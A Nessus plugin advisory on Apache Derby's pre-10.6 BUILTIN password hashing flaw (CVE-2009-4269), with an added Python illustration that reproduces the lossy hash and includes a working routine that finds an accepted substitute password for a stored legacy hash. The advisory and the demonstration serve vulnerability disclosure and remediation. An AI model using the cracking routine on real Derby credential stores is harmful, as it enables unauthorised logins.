Apache Derby 'BUILTIN' Authentication Insecure Password Hashing

This script is Copyright (C) 2011-2014 Tenable Network Security, Inc.


Synopsis :

The remote database server is running software known to be
susceptible to brute-forcing of passwords.

Description :

According to its self-reported version number, the installation of
Apache Derby running on the remote server converts each password to
bytes with a transformation that keeps only the high four bits of
every character except the last before computing the SHA-1 digest.
Every password that agrees with the real one in those surviving bits
produces the same stored hash, so the effective search space collapses
and passwords can be brute-forced quickly. This vulnerability only
affects the BUILTIN authentication method.

Note that Nessus has not tested for the issue but has instead relied
only on the application's self-reported version number.
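The following Python is an added illustration, not Derby's own code and not part of the Nessus plugin. It reimplements the lossy byte conversion that Derby 10.5 and earlier applied before the SHA-1 digest (the StringUtil.toHexByte behaviour described in DERBY-4483), so the collision behaviour can be reproduced offline: it shows which bits survive, counts how many printable passwords share one stored hash, and finds an accepted substitute for a short password by enumerating one representative per high nibble. Function names, the lowercase hex table and the "3b60" scheme tag are assumptions made for this example.

```python
"""Added illustration of the pre-10.6 Derby BUILTIN password transformation.

This is not Derby's code. It reimplements, in Python, the byte conversion that
Derby 10.5 and earlier applied before the SHA-1 digest (StringUtil.toHexByte as
described in DERBY-4483), so the collision behaviour can be observed offline.
"""
import hashlib
from itertools import product
from typing import Optional

HEX_TABLE = "0123456789abcdef"        # assumption: lowercase hex, as in Derby's StringUtil
LEGACY_SCHEME_TAG = "3b60"            # assumption: tag stored ahead of the legacy SHA-1 digest
PRINTABLE = [chr(c) for c in range(0x20, 0x7F)]   # the 95 printable ASCII characters


def derby_legacy_to_hex_byte(password: str) -> bytes:
    """Model of the flawed conversion.

    The original loop wrote the high nibble of character i to data[i] and its low
    nibble to data[i+1]; the next iteration then overwrote data[i+1] with the next
    character's high nibble. What survives is the high nibble of every character,
    the low nibble of the last one, and zero padding up to 2 * len(password).
    Bits above 0xFF of a non-Latin-1 character are discarded entirely.
    """
    data = bytearray(2 * len(password))
    for i, ch in enumerate(password):
        code = ord(ch)
        data[i] = ord(HEX_TABLE[(code & 0xF0) >> 4])
        data[i + 1] = ord(HEX_TABLE[code & 0x0F])
    return bytes(data)


def derby_legacy_hash(password: str) -> str:
    """Legacy stored form: scheme tag + hex SHA-1 of the lossy byte array."""
    return LEGACY_SCHEME_TAG + hashlib.sha1(derby_legacy_to_hex_byte(password)).hexdigest()


def collision_count(password: str, alphabet=PRINTABLE) -> int:
    """How many same-length passwords over `alphabet` hash identically to `password`."""
    if not password:
        return 1
    total = 1
    for ch in password[:-1]:  # all but the last character: only the high nibble matters
        total *= sum(1 for a in alphabet if (ord(a) & 0xF0) == (ord(ch) & 0xF0))
    last = ord(password[-1]) & 0xFF  # the last character keeps both nibbles
    return total * sum(1 for a in alphabet if (ord(a) & 0xFF) == last)


def legacy_search_space(length: int, alphabet=PRINTABLE) -> int:
    """Number of distinct legacy hashes reachable by passwords of `length` over `alphabet`."""
    high_nibbles = {ord(a) & 0xF0 for a in alphabet}  # 6 values for printable ASCII (0x20..0x7e)
    return len(high_nibbles) ** (length - 1) * len(alphabet)


def crack_legacy(target: str, length: int, alphabet=PRINTABLE) -> Optional[str]:
    """Find any password of `length` that the legacy scheme would accept for `target`.

    Because only the high nibble matters in every position but the last, one
    representative character per high nibble is enumerated there; only the final
    position needs the whole alphabet.
    """
    representatives = {}
    for a in alphabet:
        representatives.setdefault(ord(a) & 0xF0, a)
    for prefix in product(list(representatives.values()), repeat=length - 1):
        for last in alphabet:
            candidate = "".join(prefix) + last
            if derby_legacy_hash(candidate) == target:
                return candidate
    return None


if __name__ == "__main__":
    print(derby_legacy_to_hex_byte("ab"))   # high('a'), high('b'), low('b'), one pad byte
    print(derby_legacy_hash("password") == derby_legacy_hash("pbttwnrd"))  # same stored hash
    print(collision_count("password"), "printable 8-char passwords collide with 'password'")
    print(legacy_search_space(8), "distinct hashes for 8-char passwords vs", len(PRINTABLE) ** 8)
    print(crack_legacy(derby_legacy_hash("s3cr"), 4))  # an accepted substitute, under 21k hashes
```

The substitute returned by crack_legacy is not the original password, but the legacy scheme hashes it identically, so a login with it succeeds. The same idea applies to any stored value of the BUILTIN user property derby.user.<name> that begins with the legacy tag modelled here: such a hash is recoverable with roughly 6^(n-1) * 95 digest computations for an n-character printable password instead of 95^n.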

See also :

https://issues.apache.org/jira/browse/DERBY-4483
http://db.apache.org/derby/releases/release-10.6.1.0.html
http://marcellmajor.com/derbyhash.html

Solution :

Upgrade to Apache Derby 10.6.1.0 or later, which introduces the
configurable hashing scheme selected by the
derby.authentication.builtin.algorithm property (SHA-256 by default
for databases created with 10.6 or later). The upgrade does not
rewrite hashes already stored under the old scheme: for an existing
database, set the property explicitly and have every BUILTIN user's
password reset so that it is stored under the new scheme.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Temporal Score : 6.2
(CVSS2#E:F/RL:OF/RC:C)
Public Exploit Available : true

Family: Databases

Nessus Plugin ID: 52536

Bugtraq ID: 42637

CVE ID: CVE-2009-4269